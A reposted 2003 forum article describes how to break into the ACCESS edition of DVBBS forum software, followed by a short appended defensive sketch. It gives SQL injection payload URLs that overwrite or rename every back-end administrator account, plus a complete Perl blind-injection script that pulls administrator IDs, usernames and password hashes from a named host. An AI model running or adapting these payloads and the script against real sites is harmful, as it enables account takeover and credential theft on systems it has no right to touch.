163 Canada-China Net – Chinese Portal for Manitoba, Canada | Winnipeg Chinese Forum
Title:
[Repost] The Smile Behind the Absolute
Author:
Torune
Time:
2003-8-13 18:50
Title:
[Repost] The Smile Behind the Absolute
Author: PsKey <PsKey@hotmail.com>
Site: http://www.isgrey.com
Group homepage: http://c4st.51.net
Group forum: http://analysist.tocare.net
>>>Dedicated This Scrap To CaoJing & GuTing<<<
Envymask's insight helped me solve many problems; even though we are brothers, I still want to say thank you.
I was very surprised to see the security patch released by DVBBS; apparently someone had alerted the author to a class of vulnerabilities in the program. It is clear that the author did a full check of DVBBS and, while eliminating that class of vulnerabilities, also eliminated several other security risks along the way. Seeing the "fruits of my labour", which had cost me several hours, fixed by the author left me a little unhappy.
Some people and some articles wrongly believe that even if DVBBS has vulnerabilities, they can only really threaten the MSSQL edition, while the MD5-encrypted user secrets and the SESSION+COOKIE verification of the admin back end in the ACCESS edition lead everyone to think it is unbreakable: "At most you get the MD5-encrypted password, what can you do with that?", "All we can do is brute force", "DVBBS is already a very secure program"... On one dejected morning, I happened upon this dear friend, standing quietly behind the absolute, smiling...
Therefore this article shows how to break the "supposedly secure" ACCESS edition of DVBBS; exploiting the MSSQL edition is simple and boring, so I refuse to describe it. Also, would the relevant friends please patch quickly.
The attack has two steps: first obtain the administrator's MD5-encrypted secrets, then on that basis change the back-end administrator's password.
1: Obtaining any user's MD5-encrypted secrets
The SQL injection vulnerabilities in a large batch of files such as logout.asp, messanger.asp, myfile.asp... can be used for this. Among these vulnerable files, logout.asp struck me as slightly novel, so I pick it to illustrate the problem:
logout.asp:
/--------------------------------------------------------------------------
<!--#include file="conn.asp"-->
<!--#include file="inc/const.asp"-->
<%
dim activeuser
'username is read straight from the client cookie, with no filtering
membername=request.cookies("aspsky")("username")
if session("userid")<>"" then
    activeuser="delete from online where id="&session("userid")
    Conn.Execute activeuser
end if
if membername<>"" then
    'the cookie value is concatenated into the SQL statement as-is
    activeuser="delete from online where username='"&membername&"'"
    Conn.Execute activeuser
end if
Response.Cookies("aspsky").path=cookiepath
Response.Cookies("aspsky")("username")=""
Response.Cookies("aspsky")("password")=""
Response.Cookies("aspsky")("userclass")=""
Response.Cookies("aspsky")("userid")=""
Response.Cookies("aspsky")("userhidden")=""
Response.Cookies("aspsky")("usercookies")=""
session("userid")=""
conn.close
set conn=nothing
response.redirect("index.asp")
%>
/--------------------------------------------------------------------------
Problem statement: activeuser="delete from online where username='"&membername&"'"
Many people will ask: can this even be exploited?
Yes!
Steps:
1: Register a user and log in;
2: Construct membername in the COOKIE and request logout.asp, so that the SQL query the program executes includes a sub-clause we added using a logical relation;
3: Construct parameters and request the main page; if the returned page contains the registered user name, repeat step 2;
4: Obtain the secrets.
The test program is attached at the end.
2: Breaking into the admin back end
We now have the administrator's MD5-encrypted secrets and can use COOKIE spoofing to perform administrator operations on the front end. If you still insist on brute force and find it interesting, you can stop reading here.
I despise brute force. Not that it is unrealistic, but it is very boring.
admin_recycle.asp
/--------------------------------------------------------------------------
...
topicid=request("topicid")
if request("action")<>"清空回收站" then
    if topicid="" or isnull(topicid) then
        Errmsg=Errmsg+"<li>"+"请选择相关帖子后进行操作。"
        Founderr=true
    end if
end if
'tablename only has to contain "bbs"; anything else in it is accepted
if request("tablename")="topic" then
    tablename="topic"
elseif instr(request("tablename"),"bbs")>0 then
    tablename=request("tablename")
else
    Errmsg=Errmsg+"<li>"+"错误的系统参数!"
    Founderr=true
end if
'master comes from the cookie-based login, not from the session
if not master then
    Errmsg=Errmsg+"<li>"+"您不是系统管理员或者您还没有登陆。"
    Founderr=true
end if
...
'Restore recycle-bin contents
sub redel()
    dim tempnum,todaynum
    if instr(tablename,"bbs")>0 then
        'both tablename and TopicID are concatenated unfiltered
        sql="update "&tablename&" set locktopic=0 where Announceid in ("&TopicID&")"
        conn.execute(sql)
...
/--------------------------------------------------------------------------
Problems:
1: No SESSION authentication is used
2: topicid is not filtered
3: tablename is only required to contain bbs, with no other filtering at all (still not fixed as of now)
Tablename and TopicID echo each other, a truly heavenly match. Submit
http://www.psych.com/d6/admin_recycle.asp?action=还原&topicid='%20where%20id%20in%20(9&tablename=admin%20set%20[password]='ef7813118e77b0ee',lastloginip='bbs
What is actually executed is
update admin set [password]='ef7813118e77b0ee', lastloginip='bbs set locktopic=0 where Announceid in (' where id in (9)
This way, the password of the back-end administrator with ID 9 is changed to ilikecat (ef7813118e77b0ee).
After submitting the URL above, the page returns an error message. That is because the trailing SQL has a syntax error; ignore it, the statement we wanted executed has already been "correctly" executed before it.
Note: front-end administrators and back-end administrators correspond one to one; if you get it wrong you cannot log in to the back end properly. To save effort, you can:
http://www.psych.com/d6/admin_recycle.asp?action=还原&topicid='%20where%20(1=1&tablename=admin%20set%20[password]='ef7813118e77b0ee',lastloginip='bbs
changes all back-end administrator passwords to ilikecat (ef7813118e77b0ee)
http://www.psych.com/d6/admin_recycle.asp?action=还原&topicid='%20where%20(1=1&tablename=admin%20set%20username='catlikeme',lastloginip='bbs
changes all back-end administrator user names to catlikeme
Of course, it is best not to be so bored as to change every registered user's account and password.
OK, after some fiddling with local COOKIEs, please log in to the back end with catlikeme/ilikecat to do some "administration".
/--------------------[Test program for obtaining any user's MD5-encrypted information:
#!/usr/bin/perl
#Codz By PsKey<PsKey@hotmail.com>
#Exploit of DVBBS's logout.asp
#--------------------------------------------------------------------------
# This script was written for the defect in DVBBS's logout.asp; it can derive every user's
# MD5-encrypted password, and can also automatically crack the back-end admin's ID, username and password
# The script was written against the latest version; if it does not work on older versions, modify it yourself
# How to use the script:
# 1: Register a user ilikecat/catlikeme on the target forum and obtain that user's userid
# 2: Register another arbitrary user (this step is required)
# 3: Run the script and enter the command-line arguments as shown in the help
# If it is the MSSQL edition, throw this lousy script aside
#--------------------------------------------------------------------------
$|=1;
use Socket;
use Getopt::Std;
getopt('hpwium');
print "\n ===================================================\n";
print " Exploit of DVBBS's logout.asp\n";
print " Codz By PsKey<PsKey\@hotmail.com> \n";
print " www.isgrey.com && c4st.51.net \n";
print " Thanx Envymask<130\@21cn.com> \n";
print " ===================================================\n";
&usage unless ( defined($opt_h) && defined($opt_w) && defined($opt_i) && defined($opt_m));
$host=$opt_h;
$port=$opt_p||80;
$path=$opt_w;
$userid=$opt_i;
$user=$opt_u;
$mode=$opt_m;
if ($opt_m eq "p") {
    # Front-end mode: recover one user's password hash one hex digit at a time
    &usage unless defined($opt_u);
    print "\nPlease wait...\n\n";
    for ($j=1;$j<=16;$j++) {
        @dic1=(0..9);
        @dic2=(a..f);
        @dic=(@dic1,@dic2);
        &first;
        for ($i=0;$i<@dic;$i++) {
            print "$dic[$i]";
            $key=$pws.$dic[$i];
            $target = "ilikecat'%20and%20exists%20(select%20UserID%20from%20[user]%20where%20UserName='$user'%20and%20left(UserPassword,$j)='$key')%20and%20'1'='1";
            &second;
            if ("@in" !~ /ilikecat/) {
                $th=$j.th;
                print "\n\/\/------------The $th word of the password is $dic[$i]";
                $pws=$pws.$dic[$i];
                last;
            }
        }
    }
    print "\n\nSuccessful,the full password of $user is $pws.\n";
}
elsif ($opt_m eq "b") {
    #Crack ID
    print "\n\#\#\#\#\#\#\#\#\#\#\#Start cracking admin's id...";
    &first;
    for ($i=0;$i<=50;$i++) {
        $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$i)%20and%20'1'='1";
        &second;
        if ("@in" !~ /ilikecat/) {
            print "\n--------->>There is one admin's id $i";
            push (@id,$i);
            &first;
        }
    }
    print "\n\#\#\#\#\#\#\#\#\#\#\#End cracking admin's id...\n";
    sleep(2);
    #Crack the length of admin's username
    print "\n\#\#\#\#\#\#\#\#\#\#\#Start Cracking the length of admin's username...\n";
    for ($j=0;$j<@id;$j++) {
        print " \|\-\>cracking username's length which id is $id[$j] ...";
        &first;
        for ($i=0;$i<=50;$i++) {
            $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20len(username)=$i%20and%20id=$id[$j])%20and%20'1'='1";
            &second;
            if ("@in" !~ /ilikecat/) {
                print "\n--------->>The length of $id[$j] is $i";
                push (@len,$i);
                &first;
                last;
            }
        }
    }
    print "\n\#\#\#\#\#\#\#\#\#\#\#End Cracking the length of admin's username...\n";
    sleep(2);
    #Crack admin's username
    print "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's username...\n";
    @dic1=(0..9);
    @dic2=(a..z);
    @dic=(@dic1,@dic2);
    for ($j=0;$j<@id;$j++) {
        $pws="";
        print " \|\-\>cracking username which id is $id[$j] ...";
        OUTER: for ($k=1;$k<=$len[$j];$k++) {
            &first;
            USERNAME: for ($i=0;$i<@dic;$i++) {
                print "$dic[$i].";
                $key=$pws.$dic[$i];
                $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(username,$k)='$key')%20and%20'1'='1";
                &second;
                if ("@in" !~ /ilikecat/) {
                    $th=$k.th;
                    print "\n--------->>The $th word of $id[$j] username is $dic[$i]";
                    $pws=$pws.$dic[$i];
                    last USERNAME;
                }
                if ($dic[$i] eq "z") {
                    print "\ni can't crack this admin's name,maybe it is chinese.\n";
                    push (@user,"\?");
                    last OUTER;
                }
            }
        }
        push (@user,$pws);
        print "\n========>>The username is $pws which id is $id[$j]\n";
    }
    print "\n\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's username...\n";
    sleep(2);
    #Crack admin's password
    print "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's password...\n";
    @dic1=(0..9);
    @dic2=(a..f);
    @dic=(@dic1,@dic2);
    for ($j=0;$j<@id;$j++) {
        $pws="";
        print " \|\-\>cracking password which id is $id[$j] ...";
        for ($k=1;$k<=16;$k++) {
            &first;
            PASSWORD: for ($i=0;$i<@dic;$i++) {
                print "$dic[$i].";
                $key=$pws.$dic[$i];
                $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(password,$k)='$key')%20and%20'1'='1";
                &second;
                if ("@in" !~ /ilikecat/) {
                    $th=$k.th;
                    print "\n--------->>The $th word of $id[$j] password is $dic[$i]";
                    $pws=$pws.$dic[$i];
                    last PASSWORD;
                }
            }
        }
        push (@pass,$pws);
        print "\n\n========>>The password is $pws which id is $id[$j]\n\n";
    }
    print "\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's password...\n\n";
    print "We got them now:\n";
    printf("%-4s %-20s %-16s\n",ID,UserName,PassWord);
    for ($i=0;$i<@id;$i++) {
        printf("%-4d %-20s %-16s\n",$id[$i],$user[$i],$pass[$i]);
    }
}
else {
    &usage;
}
# Log in as the ilikecat user and fetch index.asp so the session is established
sub first {
    $str="username=ilikecat&password=catlikeme&CookieDate=1";
    $len=length($str);
    $req = "GET $path/login.asp?action=chk&username=ilikecat&password=catlikeme HTTP/1.1\n".
        "Referer: http://$host$path/login.asp\n".
        "Host: $host\n".
        "Content-Length: $len\n".
        "Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show;upNum=0\n".
        "\n".
        "$str\n\n";
    print "\n.";
    sendraw($req);
    $req0 = "GET $path/index.asp HTTP/1.0\n".
        "Referer: http://$host$path/index.asp\n".
        "Host: $host\n".
        "Cookie: aspsky=userid=$userid&usercookies=0&userhidden=2&password=aac9ac496fa5ea8e&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=ilikecat; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n";
    print ".\n";
    sendraw($req0);
}
# Send the crafted username cookie to logout.asp, then check whether index.asp still shows the user
sub second {
    $req1 = "GET $path/logout.asp HTTP/1.0\n".
        "Host: $host\n".
        "Cookie: aspsky=userid=$userid&usercookies=1&userhidden=2&username=$target; iscookies=0; BoardList=BoardID=Show; \n\n";
    print ".";
    @res = sendraw($req1);
    $req2 = "GET $path/index.asp?action=show HTTP/1.0\n".
        "Referer: http://$host$path/index.asp?action=show \n".
        "Host: $host\n".
        "Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n";
    print ".";
    @in = sendraw($req2);
}
sub usage {
    print qq~
Usage: $0 -h <Host> [-p <port>] -w <path> -i <userid> -m <mode> [-u <user>]
-h =hostname you want to attack
-p =port,80 default
-w =the web path such as "/dvbbs"
-i =the userid of ilikecat
-m =only two choice,b<background> and p<proscenium>(This option need -u)
-u =the user you want to crack
Eg: 1.Crack proscenium
$0 -h www.target.com -p 80 -w /dvbbs -i 2 -m p -u admin
2.Crack background
$0 -h www.target.com -p 80 -w /dvbbs -i 2 -m b
~;
    exit;
}
# Raw TCP send of one HTTP request; returns the response lines
sub sendraw {
    my ($req) = @_;
    my $target;
    $target = inet_aton($host) || die("inet_aton problems\n");
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
    if(connect(S,pack "SnA4x8",2,$port,$target)){
        select(S);
        $| = 1;
        print $req;
        my @res = <S>;
        select(STDOUT);
        close(S);
        return @res;
    }
    else {
        die("Can't connect...\n");
    }
}
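As an added defensive counterpart to the three problems the post lists for admin_recycle.asp (and the same unfiltered concatenation in logout.asp), not part of the original article or of DVBBS: a Python sketch of the restore path with the session-style check performed first, tablename matched against an exact whitelist instead of "contains bbs", topicid restricted to a list of integers, and the ids bound as query parameters. sqlite3 stands in for the Access database, and the whitelist contents and table layout are assumptions built from the names on the page.

```python
import re
import sqlite3

# Identifiers cannot be bound as parameters, so they come from a fixed whitelist.
# Assumed: per-board tables are named bbs<N>; list only the ones that exist.
ALLOWED_TABLES = {"topic", "bbs1", "bbs2"}

def parse_topicid(raw):
    """Accept only a comma-separated list of integers, the form a real request sends."""
    if not re.fullmatch(r"[0-9]+(,[0-9]+)*", raw):
        raise ValueError("topicid must be a comma-separated list of integers")
    return [int(x) for x in raw.split(",")]

def check_tablename(raw):
    """Exact whitelist match replaces the original instr(tablename, "bbs") test."""
    if raw not in ALLOWED_TABLES:
        raise ValueError("unknown tablename")
    return raw

def build_restore_sql(tablename, topicid):
    """Return (sql, params): whitelisted identifier, one bound parameter per id."""
    table = check_tablename(tablename)
    ids = parse_topicid(topicid)
    marks = ",".join("?" for _ in ids)
    return f"update {table} set locktopic=0 where Announceid in ({marks})", ids

def restore_topics(conn, tablename, topicid, is_master):
    """redel() with the authorisation check done before any input is touched."""
    if not is_master:  # is_master must come from server-side session state, not a cookie
        raise PermissionError("not an administrator")
    sql, params = build_restore_sql(tablename, topicid)
    return conn.execute(sql, params).rowcount

def demo():
    """Constructed in-memory database: one board table plus the admin table the payload targets."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table bbs1 (Announceid integer, locktopic integer)")
    conn.executemany("insert into bbs1 values (?, 1)", [(7,), (8,), (9,)])
    conn.execute("create table admin (id integer, username text, password text, lastloginip text)")
    conn.execute("insert into admin values (9, 'admin', 'ORIGINALHASH', '127.0.0.1')")
    updated = restore_topics(conn, "bbs1", "7,9", True)  # legitimate request
    rejected = False
    try:  # the post's own payload pair is refused before any SQL is built
        restore_topics(conn, "admin set [password]='ef7813118e77b0ee',lastloginip='bbs",
                       "' where id in (9", True)
    except ValueError:
        rejected = True
    admin_pw = conn.execute("select password from admin where id=9").fetchone()[0]
    return updated, rejected, admin_pw
```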
Author:
Torune
Time:
2003-8-13 18:52
Title:
[Repost] The Smile Behind the Absolute
Parts of the article were mangled by the forum's features.
Everyone can read it at http://bbs.c4st.cn
Welcome to 163 Canada-China Net – Chinese Portal for Manitoba, Canada | Winnipeg Chinese Forum (http://appdev.163.ca/dz163/)
Powered by Discuz! X3.2